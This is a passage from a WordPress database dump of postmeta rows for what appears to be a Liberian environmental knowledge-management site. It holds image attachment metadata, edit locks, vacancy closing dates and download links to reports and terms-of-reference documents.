;s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(37863,5605,'_edit_lock','1756993173:38'),(37864,5605,'_last_editor_used_jetpack','block-editor'),(37865,5606,'_wp_attached_file','2025/09/Noise-pic-scaled.jpg'),(37866,5606,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1152;s:4:\"file\";s:28:\"2025/09/Noise-pic-scaled.jpg\";s:8:\"filesize\";i:357123;s:5:\"sizes\";a:17:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"Noise-pic-300x135.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:135;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12078;}s:5:\"large\";a:5:{s:4:\"file\";s:22:\"Noise-pic-1024x461.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:461;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:78127;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"Noise-pic-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7173;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"Noise-pic-768x346.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:346;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:50565;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:22:\"Noise-pic-1536x691.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:691;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:147548;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:22:\"Noise-pic-2048x922.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:922;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:239900;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:21:\"Noise-pic-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22623;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:20:\"Noise-pic-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5365;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:21:\"Noise-pic-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13172;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:21:\"Noise-pic-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29301;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:21:\"Noise-pic-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31159;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:21:\"Noise-pic-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45255;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:22:\"Noise-pic-1170x650.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:111859;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:23:\"Noise-pic-1920x1080.jpg\";s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:254774;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:21:\"Noise-pic-600x270.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34520;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:21:\"Noise-pic-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:59445;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:22:\"Noise-pic-1280x640.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:118613;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:13:\"Noise-pic.jpg\";}'),(37869,5605,'_wp_old_date','2025-09-01'),(37870,5605,'_thumbnail_id','5606'),(37871,5605,'_edit_last','38'),(37872,5605,'kava_extra_enable_breadcrumbs','inherit'),(37873,5605,'post_formats',''),(37874,5605,'gallery_tab',''),(37875,5605,'kava_extra_gallery_images',''),(37876,5605,'link_tab',''),(37877,5605,'kava_extra_link',''),(37878,5605,'kava_extra_link_target','_blank'),(37879,5605,'quote_tab',''),(37880,5605,'kava_extra_quote_text',''),(37881,5605,'kava_extra_quote_cite',''),(37882,5605,'audio_tab',''),(37883,5605,'kava_extra_audio',''),(37884,5605,'kava_extra_audio_loop','false'),(37885,5605,'kava_extra_audio_autoplay','false'),(37886,5605,'kava_extra_audio_preload','false'),(37887,5605,'video_tab',''),(37888,5605,'kava_extra_video_type','library'),(37889,5605,'kava_extra_video_library',''),(37890,5605,'kava_extra_video_external',''),(37891,5605,'kava_extra_video_poster',''),(37892,5605,'kava_extra_video_width','770'),(37893,5605,'kava_extra_video_height','480'),(37894,5605,'kava_extra_video_loop','false'),(37895,5605,'kava_extra_video_autoplay','false'),(37896,5605,'kava_extra_video_preload','false'),(37900,5609,'_last_editor_used_jetpack','classic-editor'),(37901,5609,'_edit_lock','1761233111:38'),(37902,5609,'_edit_last','38'),(37903,5610,'_wp_attached_file','2025/10/Screenshot-2025-10-23-at-14.31.10.png'),(37904,5610,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1068;s:6:\"height\";i:1498;s:4:\"file\";s:45:\"2025/10/Screenshot-2025-10-23-at-14.31.10.png\";s:8:\"filesize\";i:429925;s:5:\"sizes\";a:15:{s:6:\"medium\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-10-23-at-14.31.10-214x300.png\";s:5:\"width\";i:214;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:42893;}s:5:\"large\";a:5:{s:4:\"file\";s:46:\"Screenshot-2025-10-23-at-14.31.10-730x1024.png\";s:5:\"width\";i:730;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:426394;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-10-23-at-14.31.10-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:17745;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:46:\"Screenshot-2025-10-23-at-14.31.10-768x1077.png\";s:5:\"width\";i:768;s:6:\"height\";i:1077;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:295288;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-10-23-at-14.31.10-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:70880;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:44:\"Screenshot-2025-10-23-at-14.31.10-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:11101;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-10-23-at-14.31.10-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:41385;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-10-23-at-14.31.10-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:114370;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-10-23-at-14.31.10-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:125903;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-10-23-at-14.31.10-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:163311;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:46:\"Screenshot-2025-10-23-at-14.31.10-1068x650.png\";s:5:\"width\";i:1068;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:173574;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:47:\"Screenshot-2025-10-23-at-14.31.10-1068x1080.png\";s:5:\"width\";i:1068;s:6:\"height\";i:1080;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:303563;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-10-23-at-14.31.10-600x842.png\";s:5:\"width\";i:600;s:6:\"height\";i:842;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:246850;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-10-23-at-14.31.10-640x640.png\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:262575;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:46:\"Screenshot-2025-10-23-at-14.31.10-1068x640.png\";s:5:\"width\";i:1068;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:173140;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(37905,5611,'_wp_attached_file','2025/10/Liberia-CPF-2026-2030.pdf'),(37906,5611,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:2252283;}'),(37907,5609,'_wp_page_template','default'),(37908,5609,'download_link','https://ekmsliberia.info/wp-content/uploads/2025/10/Liberia-CPF-2026-2030.pdf'),(37909,5609,'by','EPA'),(37910,5609,'year','2025'),(37911,5609,'_pods_document_cover_image','a:1:{i:0;i:5610;}'),(37913,5609,'_pods_attached_document','a:1:{i:0;i:5611;}'),(37923,5609,'document_cover_image','5610'),(37924,5609,'attached_document','5611'),(37925,5613,'_edit_lock','1761324394:38'),(37926,5613,'_last_editor_used_jetpack','block-editor'),(37927,5614,'_last_editor_used_jetpack','classic-editor'),(37928,5614,'_edit_lock','1761560913:38'),(37929,5614,'_edit_last','38'),(37930,5614,'_wp_page_template','default'),(37931,5614,'closed_date','2025-11-14'),(37932,5614,'owner','EPA'),(37933,5614,'vacancy_link',''),(37934,5616,'_wp_attached_file','2025/10/ToR-for-International-Financial-Specialist.docx'),(37935,5616,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:87542;}'),(37936,5618,'_last_editor_used_jetpack','classic-editor'),(37937,5618,'_edit_lock','1761561748:38'),(37938,5618,'_edit_last','38'),(37939,5618,'_wp_page_template','default'),(37940,5618,'closed_date','2025-11-14'),(37941,5618,'owner','EPA'),(37942,5618,'vacancy_link',''),(37943,5620,'_wp_attached_file','2025/10/Final-Market-Stuties-National-Consultant-ToR.docx'),(37944,5620,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:91614;}'),(37945,5622,'_last_editor_used_jetpack','classic-editor'),(37946,5622,'_edit_lock','1761732757:38'),(37947,5622,'_edit_last','38'),(37948,5622,'_wp_page_template','default'),(37949,5622,'closed_date','2025-10-27'),(37950,5622,'owner',''),(37951,5622,'vacancy_link',''),(37952,5624,'_wp_attached_file','2025/10/Contractual-Service-Inclusive-Finance-Specialist.docx'),(37953,5624,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:84321;}'),(37954,5626,'_last_editor_used_jetpack','classic-editor'),(37955,5626,'_edit_lock','1761930592:38'),(37956,5626,'_edit_last','38'),(37957,5627,'_wp_attached_file','2025/10/Screenshot-2025-10-31-at-13.42.43.png'),(37958,5627,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1336;s:6:\"height\";i:1734;s:4:\"file\";s:45:\"2025/10/Screenshot-2025-10-31-at-13.42.43.png\";s:8:\"filesize\";i:1305684;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-10-31-at-13.42.43-231x300.png\";s:5:\"width\";i:231;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:67740;}s:5:\"large\";a:5:{s:4:\"file\";s:46:\"Screenshot-2025-10-31-at-13.42.43-789x1024.png\";s:5:\"width\";i:789;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:618867;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-10-31-at-13.42.43-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:25572;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-10-31-at-13.42.43-768x997.png\";s:5:\"width\";i:768;s:6:\"height\";i:997;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:542122;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:47:\"Screenshot-2025-10-31-at-13.42.43-1183x1536.png\";s:5:\"width\";i:1183;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1226913;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-10-31-at-13.42.43-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:110211;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:44:\"Screenshot-2025-10-31-at-13.42.43-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:16990;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-10-31-at-13.42.43-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:57270;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-10-31-at-13.42.43-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:149552;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-10-31-at-13.42.43-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:166648;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-10-31-at-13.42.43-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:256562;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:46:\"Screenshot-2025-10-31-at-13.42.43-1170x650.png\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:674583;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:47:\"Screenshot-2025-10-31-at-13.42.43-1336x1080.png\";s:5:\"width\";i:1336;s:6:\"height\";i:1080;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:880839;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-10-31-at-13.42.43-600x779.png\";s:5:\"width\";i:600;s:6:\"height\";i:779;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:357872;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-10-31-at-13.42.43-640x640.png\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:339239;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:46:\"Screenshot-2025-10-31-at-13.42.43-1280x640.png\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:659560;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(37959,5628,'_wp_attached_file','2025/10/UHI-study-report-final.pdf'),(37960,5628,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:6504128;}'),(37961,5626,'_wp_page_template','default'),(37962,5626,'download_link','https://ekmsliberia.info/wp-content/uploads/2025/10/UHI-study-report-final.pdf'),(37963,5626,'by','National University Climate Action Laboratory'),(37964,5626,'year','October 2025'),(37965,5626,'_pods_document_cover_image','a:1:{i:0;i:5627;}'),(37967,5626,'_pods_attached_document','a:1:{i:0;i:5628;}'),(37969,5626,'document_cover_image','5627'),(37970,5626,'attached_document','5628'),(37973,5631,'_last_editor_used_jetpack','classic-editor'),(37974,5631,'_edit_lock','1781714387:38'),(37975,5631,'_edit_last','38'),(37976,5631,'_wp_page_template','default'),(37977,5631,'closed_date','2025-12-01'),(37978,5631,'owner','EPA'),(37979,5631,'vacancy_link',''),(37980,5636,'_edit_lock','1764238108:38'),(37981,5636,'_last_editor_used_jetpack','block-editor'),(37982,5637,'_wp_attached_file','2025/11/EKMS-NEW.jpeg'),(37983,5637,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:21:\"2025/11/EKMS-NEW.jpeg\";s:8:\"filesize\";i:154353;s:5:\"sizes\";a:14:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"EKMS-NEW-300x225.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19094;}s:5:\"large\";a:5:{s:4:\"file\";s:22:\"EKMS-NEW-1024x768.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:124482;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"EKMS-NEW-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8092;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"EKMS-NEW-768x576.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:81646;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:21:\"EKMS-NEW-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25665;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:20:\"EKMS-NEW-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5621;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:21:\"EKMS-NEW-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15308;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:21:\"EKMS-NEW-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35763;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:21:\"EKMS-NEW-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38376;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:21:\"EKMS-NEW-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:54107;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:22:\"EKMS-NEW-1170x650.jpeg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:127569;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:21:\"EKMS-NEW-600x450.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:55767;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:21:\"EKMS-NEW-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:74470;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:22:\"EKMS-NEW-1280x640.jpeg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:133623;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(37986,5636,'_thumbnail_id','5637'),(37987,5636,'_edit_last','38'),(37988,5636,'kava_extra_enable_breadcrumbs','inherit'),(37989,5636,'post_formats',''),(37990,5636,'gallery_tab',''),(37991,5636,'kava_extra_gallery_images',''),(37992,5636,'link_tab',''),(37993,5636,'kava_extra_link',''),(37994,5636,'kava_extra_link_target','_blank'),(37995,5636,'quote_tab',''),(37996,5636,'kava_extra_quote_text',''),(37997,5636,'kava_extra_quote_cite',''),(37998,5636,'audio_tab',''),(37999,5636,'kava_extra_audio',''),(38000,5636,'kava_extra_audio_loop','false'),(38001,5636,'kava_extra_audio_autoplay','false'),(38002,5636,'kava_extra_audio_preload','false'),(38003,5636,'video_tab',''),(38004,5636,'kava_extra_video_type','library'),(38005,5636,'kava_extra_video_library',''),(38006,5636,'kava_extra_video_external',''),(38007,5636,'kava_extra_video_poster',''),(38008,5636,'kava_extra_video_width','770'),(38009,5636,'kava_extra_video_height','480'),(38010,5636,'kava_extra_video_loop','false'),(38011,5636,'kava_extra_video_autoplay','false'),(38012,5636,'kava_extra_video_preload','false'),(38013,5639,'_last_editor_used_jetpack','classic-editor'),(38014,5639,'_edit_lock','1764600521:38'),(38015,5639,'_edit_last','38'),(38016,5639,'_wp_page_template','default'),(38017,5639,'closed_date','2025-12-22'),(38018,5639,'owner','EPA'),(38019,5639,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2025/12/Vacancy-for-ME-Assistant-BBNJ.pdf'),(38020,5641,'_wp_attached_file','2025/12/Vacancy-for-ME-Assistant-BBNJ.pdf'),(38021,5641,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:246904;}'),(38022,5643,'_last_editor_used_jetpack','classic-editor'),(38023,5643,'_edit_lock','1764599761:38'),(38024,5643,'_edit_last','38'),(38025,5643,'_wp_page_template','default'),(38026,5643,'closed_date','2025-12-22'),(38027,5643,'owner','EPA'),(38028,5643,'vacancy_link',''),(38029,5645,'_wp_attached_file','2025/12/Vacancy-for-Admin-and-Finance-Assistant-BBNJ.pdf'),(38030,5645,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:245293;}'),(38035,5649,'_last_editor_used_jetpack','classic-editor'),(38036,5649,'_edit_lock','1773749215:38'),(38037,5649,'_edit_last','38'),(38038,5649,'_wp_page_template','default'),(38039,5649,'closed_date','2025-12-10'),(38040,5649,'owner','EPA'),(38041,5649,'vacancy_link',''),(38042,5651,'_wp_attached_file','2025/12/Announcement-to-Recruit-Consultnats.docx'),(38043,5651,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:155335;}'),(38044,5653,'_last_editor_used_jetpack','classic-editor'),(38045,5653,'_edit_lock','1764769069:38'),(38046,5653,'_edit_last','38'),(38047,5653,'_wp_page_template','default'),(38048,5653,'closed_date','2025-12-10'),(38049,5653,'owner','EPA/UNDP'),(38050,5653,'vacancy_link',''),(38051,5655,'_wp_attached_file','2025/12/Contractual-Service-Inclusive-Finance-Specialist.docx'),(38052,5655,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:84570;}'),(38053,5657,'_last_editor_used_jetpack','classic-editor'),(38054,5657,'_edit_lock','1764770098:38'),(38055,5657,'_edit_last','38'),(38056,5657,'_wp_page_template','default'),(38057,5657,'closed_date','2025-12-10'),(38058,5657,'owner','EPA/UNDP'),(38059,5657,'vacancy_link',''),(38060,5659,'_wp_attached_file','2025/12/Final-Market-Stuties-National-Consultant-ToR.docx'),(38061,5659,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:91747;}'),(38062,5662,'_edit_lock','1764772167:38'),(38063,5662,'_last_editor_used_jetpack','block-editor'),(38064,5663,'_wp_attached_file','2025/12/WhatsApp-Image-2025-12-02-at-13.41.04.jpeg'),(38065,5663,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:1066;s:4:\"file\";s:50:\"2025/12/WhatsApp-Image-2025-12-02-at-13.41.04.jpeg\";s:8:\"filesize\";i:283971;s:5:\"sizes\";a:15:{s:6:\"medium\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-12-02-at-13.41.04-300x200.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20035;}s:5:\"large\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2025-12-02-at-13.41.04-1024x682.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:141251;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-12-02-at-13.41.04-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9129;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-12-02-at-13.41.04-768x512.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:89282;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2025-12-02-at-13.41.04-1536x1023.jpeg\";s:5:\"width\";i:1536;s:6:\"height\";i:1023;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:264074;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-12-02-at-13.41.04-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29959;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:49:\"WhatsApp-Image-2025-12-02-at-13.41.04-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6236;}s:14:\"kava-thumb-s-2\";a:5:{s